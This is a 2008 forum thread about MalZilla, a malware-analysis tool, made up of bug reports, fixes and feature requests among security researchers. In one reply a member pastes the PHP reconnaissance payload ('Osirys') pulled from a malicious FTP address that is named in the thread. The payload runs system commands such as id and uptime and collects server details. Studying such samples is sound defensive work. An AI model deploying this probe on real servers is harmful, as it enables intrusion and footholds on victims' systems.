Author Topic: MalZilla  (Read 257381 times)

0 Members and 1 Guest are viewing this topic.

September 03, 2008, 05:29:35 am
Reply #195

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Another odd bug with v1.0. Right click-exit from the system tray causes Malzilla to return an empty dialog box and fail to exit.

Malzilla
-------
(X)
[ok]

TJS

September 03, 2008, 05:30:32 am
Reply #196

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Actually, I don't know what I did-- but malzilla refuses to exit altogether! :P Anywhere I go to try to exit causes this dialog box. Going to have to terminate it the 'fun' way (process explorer) :)

September 03, 2008, 03:52:24 pm
Reply #197

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I have reproduced the AccessViolation that JohnC and MysteryFCM got. I'm working on it.
If it is a kind of excuse, it is not my fault. It is a fault of the code behind the SynMemo component that I use in Malzilla.

September 03, 2008, 04:00:32 pm
Reply #198

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
On some sites when you click send script to decoder, it might not highlight and send the script, or it might only send one. As an example, this will send the top script but if you click it again it doesn't send the second script and if you click it again it doesn't send the third. But if you click it again (there are only 3 scripts) it will go back to the beginning and highlight/send the first script like it should.

http://www.google.co.uk/

Also, if you click Run Script on decoders tab when there is no script, it will say script compiled, but the run script and debug button will turn grey like it is busy. So you cannot use it, until you close malzilla and re-open it.

September 03, 2008, 05:05:30 pm
Reply #199

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I've just fixed the problem with finding scripts and with disabled buttons.
I've also fixed AccessViolations.
Only remaining problem is if the decoding get stuck, I can't do anything like Cancel button.

September 03, 2008, 05:21:50 pm
Reply #200

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Please download this build from here:
http://malzilla.sourceforge.net/builds/

September 03, 2008, 06:24:45 pm
Reply #201

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Just downloaded the latest one, which appears may have a ftp problem. I was unable to reterive the script from this link, ftp://216.12.192.109/ids.txt

The script at the link was then reterived using the first malzilla version incorporating ftp.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

September 03, 2008, 06:28:43 pm
Reply #202

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Works fine here. Can you test with WGET or with older version of Malzilla again?
Maybe is a temporary server glitch or something like that.

September 03, 2008, 06:34:31 pm
Reply #203

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Prolly just a server glitch ..... script was snagged without issue here :)

Code: [Select]
<?php
function ConvertBytes($number)
{
        
$len strlen($number);
        if(
$len 4)
        {
                return 
sprintf("%d b"$number);
        }
        if(
$len >= && $len <=6)
        {
                return 
sprintf("%0.2f Kb"$number/1024);
        }
        if(
$len >= && $len <=9)
        {
                return 
sprintf("%0.2f Mb"$number/1024/1024);
        }
   
        return 
sprintf("%0.2f Gb"$number/1024/1024/1024);
                           
}

echo 
"Osirys<br>";
$un = @php_uname();
$up system(uptime);
$id1 system(id);
$pwd1 = @getcwd();
$sof1 getenv("SERVER_SOFTWARE");
$php1 phpversion();
$name1 $_SERVER['SERVER_NAME'];
$ip1 gethostbyname($SERVER_ADDR);
$free1diskfreespace($pwd1);
$free ConvertBytes(diskfreespace($pwd1));
if (!
$free) {$free 0;}
$all1disk_total_space($pwd1);
$all ConvertBytes(disk_total_space($pwd1));
if (!
$all) {$all 0;}
$used ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo 
"Osirys was here ..<br>";
echo 
"uname -a: $un<br>";
echo 
"os: $os<br>";
echo 
"uptime: $up<br>";
echo 
"id: $id1<br>";
echo 
"pwd: $pwd1<br>";
echo 
"php: $php1<br>";
echo 
"software: $sof1<br>";
echo 
"server-name: $name1<br>";
echo 
"server-ip: $ip1<br>";
echo 
"free: $free<br>";
echo 
"used: $used<br>";
echo 
"total: $all<br>";
exit;
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 03, 2008, 06:44:01 pm
Reply #204

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Just tried grabbing it with the new version, this time it worked fine.

Must have been a server burp.

Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

October 08, 2008, 08:15:40 pm
Reply #205

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.

October 12, 2008, 07:31:09 am
Reply #206

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.
I'm giving my best to do something about that script that uses HTML elements (where you also need these cookies).
I got one week free from the job (there is no job for me next week in the company), so I hope I'll get these new issues with obfuscation solved (incl. caching the cookies).

October 12, 2008, 03:49:44 pm
Reply #207

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Implemented extended cache (cookies inclusive).
Partial working solution for the LuckySploit (the one with HTML elements and cookie).
Shellcode analyzer based on libemu is already implemented (you can analyze these WMF, ANI, PDF etc. exploits now).
As soon as I get some more free time, I'll finish LuckySploit deobfuscation and I'll push a release.
Malzilla's site would also need some updating :(

October 12, 2008, 03:54:09 pm
Reply #208

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Looking forward to it dude :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

October 12, 2008, 06:38:16 pm
Reply #209

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Keep up the good work :)